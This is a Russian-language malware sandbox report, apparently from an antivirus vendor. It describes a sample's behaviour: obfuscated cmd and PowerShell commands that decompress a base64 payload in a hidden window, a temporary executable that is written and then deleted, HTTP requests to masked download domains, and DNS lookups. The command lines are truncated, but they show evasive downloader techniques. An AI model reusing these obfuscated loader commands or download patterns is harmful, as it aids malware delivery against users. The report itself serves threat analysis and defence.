Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' <SYSTEM32>\cMd.eXE /c"seT oDB= ( NeW-ObjECT IO.COMPresSioN.DeFLatEStREAm( [Io.MemoRysTreAm] [cONvErt]::fROMbASE64sTRIng( 'NZDLbsIwEEV/JYtIBlHsPmipiCLxLEJCbLpg042dTBI3xnZtJyag/HsTWrYz554Z3VB...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\673.exe
Удаляет следующие файлы
- %TEMP%\673.exe
Сетевая активность
Подключается к
- 'fy###a.unipo.sk':80
- 'le####chesrient.com':80
- 'bo###s-print.ru':80
TCP
Запросы HTTP GET
- http://fy###a.unipo.sk/data/geo/agent/wav2/virus/LWG4sdt
- http://le####chesrient.com/logsite/1ytczfElCN
- http://www.le####chesrient.com/logsite/1ytczfElCN
- http://bo###s-print.ru/Da4pr05By8
UDP
- DNS ASK he####skfixer.com
- DNS ASK fy###a.unipo.sk
- DNS ASK le####chesrient.com
- DNS ASK ef####ilgisayar.com
- DNS ASK bo###s-print.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' <SYSTEM32>\cMd.eXE /c"seT oDB= ( NeW-ObjECT IO.COMPresSioN.DeFLatEStREAm( [Io.MemoRysTreAm] [cONvErt]::fROMbASE64sTRIng( 'NZDLbsIwEEV/JYtIBlHsPmipiCLxLEJCbLpg042dTBI3xnZtJyag/HsTWrYz554Z3VB...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-ITem (\"VAriAB\" +\"Le:zl\" + \"AH\" + \"3g\") ( [tYPE]( \"{0}{3}{1}{2}\"-F'En','RoN','menT','vi' ) ) ;( &( \"{0}{1}\" -f'D','IR') (\"{3}{1}{2}{4}{0}\"-f 'oncONtext','R','i','va',...
